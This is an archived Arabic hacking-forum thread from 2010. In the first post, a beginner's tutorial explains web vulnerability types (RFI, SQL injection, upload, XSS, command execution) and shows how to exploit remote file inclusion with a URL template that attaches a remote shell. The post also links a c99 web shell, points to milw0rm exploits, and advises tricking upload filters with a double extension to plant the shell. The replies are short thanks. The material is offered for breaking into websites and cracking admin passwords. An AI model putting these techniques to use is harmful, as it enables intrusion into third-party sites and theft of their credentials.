المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ((شرح الثغرات + طريقة رفع الشيل في ثغرات Remote File ))- حصريا + احترف يا مبتدئ



عطر الكون
02-10-2010, 06:55 PM
السلام عليكم ورحمة الله وبركاته

الثغرات :
شرح تفصيلي للاخو المبتدئين
نشالله الجميع بستفاد منه وانا متأكد رح يستفادوا بس بده شوية تدقيق وانتبه على كل خطوة اوك


تابــــــــــــــــــــــ ــــــــــــــــــــــع




(( الثغرات عبارة عن اخطاء يقع فيها مصمم البرنامج او سكربت معين ... ومن خلال هذه الاخطاء يجد الهكر
منافذ لدخول الى المواقع .. والوصول الى السيرفر ))
* البرامج يقصد بها السكربتات الموجوده فى مواقع معينه على سبيل المثال .. المنتدى عبارة عن سكربت ...
او سكربت الصور .... او سكربت مكتبه البرامج
Powered by vBulletin Version = يدل على سكربت المنتدى ... وهكذا


انواع الثغرات : الثغرات تنقسم الى عنده انواع كثيرة ولكن سوف ناخذ بعض من هذه الثغرات وسوف نشرحها


1 - ثغرات الفايل انكلود (( Remote File Inclusion Vulnerability ))
يقصد بهذا النوع من الثغرات ... ان المصمم وقع فى خط برمجى وهذا الخطء يسمح لى رابط ملف خارجى بالموقع
وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )


2 - ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا
معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع


3 - ثغرات الرفع (( Remote File Uploed )) ويقصد بها الثغرات التى تستطيع من خلالها رفع ملف على الموقع
مثل ثغرات مراكز التحميل


4 - ثغرات (( Cross-Site Scripting )) وهى XXS ويقصد بها الثغرات التى تستطيع من خلالها بسحب كوكيز اعضاء الموقع عبر كود معين ... مثال على ثغرات ( الثغرات الهوتميل )


5 - ثغرات File Disclosure وهى الثغرات الى تستطيع من خلالها قرائة اى ملف على الموقع وهى تقريبا
نفس ثغرات الفايل انكلود
6 - ثغرات Command Execution وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لينكس
على المتصفح بعد الاستغلال


تقريباا هذه اشهر الثغرات المعروفه فى المواقع كما ان هناك ثغرات غير هذه مثل ثغرات Perl وثغرات البفر
والزيور داي 0-day .... الخ


* شرح التفصلي لثغرات ...
1 - ثغرة الفايل انكلود ... طبعا نحن قلنا ان هذا النوع من الثغرات تسمح لى رابط ملف خارجى بالموقع بو اسطة متغير
معين وطبعا الملف الخارجي يكون ( الشل = اداه اختراق )


على سبيل المثال ... عندى موقع www.XXXXXX.com/vb/ مصاب بثغرة فايل فى سكربت المنتدى الى هو VB
والخط على صفحة faq.php والمتغير الى يسمح لى بربط الشل هو shoot3r
فان الثغرة والاستغلال يكون بهذا الشكل ...
/ww.XXXXXX.com/vb/faq.php?shoot3r=youshell.txt?cmd



تذكر ان ثغرات الانكلود تتكون من ( السكربت المصاب / مكان المجلد / الصفحة التى يوجد بها المتغير الى يسمح بربط الشل )


www.xxxx.com/Folder/pag.php?incloud=youshell.txt?
الموقع = www.xxx.com
مجلد السكربت = Folder
الصفحة التى فيها المتغير الى يسمح لنا بجلب ملف خارجى = pag.php
المتغير الى نربط به الملف الخارجى ( الشل ) incloud
علامة =
الشل بصغية تكتس = youshell.txt
وعلامة ؟


وكذا نحن الان عرفنا كيفية التعامل مع الثغرات الفايل انكلود .. ولكن انا اعتقد انه الحين فى سؤال يدور فى ذهن المبدئين



وهو .. كيف اعرف ثغرات الانكلود ... او كيف اعرف الاستغلال لثغرة ...

راح نقولك يا اخى العزيز .. انه فى مواقع سيكورتى خاصة تعرض لك اخر الثغرات المكتشفة بالاضافة الى طريقة الاستغلال



من هذه المواقع milw0rm - exploits : vulnerabilities : videos : papers : shellcode (http://milw0rm.org) وكذلك SecurityFocus (http://securityfocus.com)



طيب ناخذ مثال من المواقع السيكورتى ... http://milw0rm.org/***apps.php ونبحث عن الثغرات الفايل الانكلود
هذا مثال على الثغرة syndeoCMS 2.5.01 (cmsdir) Remote File Inclusion Vulnerability (http://milw0rm.org/exploits/4607)


http://www7.0zz0.com/2009/03/19/08/671575454.jpg



http://www7.0zz0.com/2009/03/19/08/599945550.jpg


وهذا شيل c99
MEGAUPLOAD - The leading online storage and file delivery service (http://www.megaupload.com/?d=F4UM8XRV)


النوع الثاني من الثغرات
ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع
وتعرف هذا الثغرة باسم SQL واستعملها سهل جداا .. تضع الاستغلال على المتصفح الانترنيت اكسلبور .. وتلاحظ الباس
وغالبا يكون الباس مشفر MD5 وهناك الكثير من المواقع الى تفك التشفير ...


ناخذ مثال على هذا النوع Softbiz Link Directory Script Remote SQL Injection Vulnerability (http://milw0rm.org/exploits/4620)


http://www7.0zz0.com/2009/03/19/08/149466130.jpg


النوع الثالث ثغرات الرفع ( ثغرات مراكز التحميل ) وهى تقريبا اسهل انواع الثغرات .. فقط تقوم برفع الشل
شاهد معى الصورة يقول لك ادارج الملف ثم اضغط على الابلود بمعنى رفع ... وغلبااا نحتاج الى خداع المركز
فى الامتداد بحث يكون ا متداد الشل الى نسخدمه هكذا C99.php.rar


http://www7.0zz0.com/2009/03/19/08/163154018.jpg



مع خالص تحياتي

جبران
02-18-2010, 08:57 PM
يعطيك العافيه صراحه شرح جميل

~ second life ~
02-24-2010, 08:57 PM
أبداااع صراحهـ .. { عطر الكون } ..

شرح واضح ..

تقبلي مروري ..ّ!

sasouki_xXx
02-24-2010, 09:29 PM
مشكوووووور والله يعطيك الف عافيه

catro
04-27-2010, 01:40 PM
مشكووور والله لو احترفته ما انفع بيع الا الاسلام

catro
04-27-2010, 01:41 PM
جديدك يا مااااااااان بقى

m!iṧṧ ṧǿṧǿ
04-27-2010, 02:24 PM
روعا
مشكورا =(

hessam-h
05-18-2010, 03:10 PM
Mersiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

menamedhat
05-28-2010, 03:50 PM
جار التجربه

aamiri
05-28-2010, 09:49 PM
يعطيك العافية

alaacol
05-29-2010, 07:04 PM
اكثر من روووووووووووووووووووووووو عه

youssef hacer
01-05-2012, 05:04 PM
..::ŤΉЙЌ ЏŌЦ::..

abd_ayd
01-05-2012, 10:05 PM
الله يعطيك العافية

legend406
01-29-2012, 12:28 AM
يعطيك العافية

مشاري احمد
03-25-2012, 04:18 AM
مشكووووووووووووور

hackerx
04-17-2012, 05:34 PM
شكرا لك
لكن الشرح انا احسست اني لم افهم الفكرة اتمنى انا افهمها في شروح أخرى

tarekgt
05-11-2012, 05:27 PM
مشكورررررررررررررررر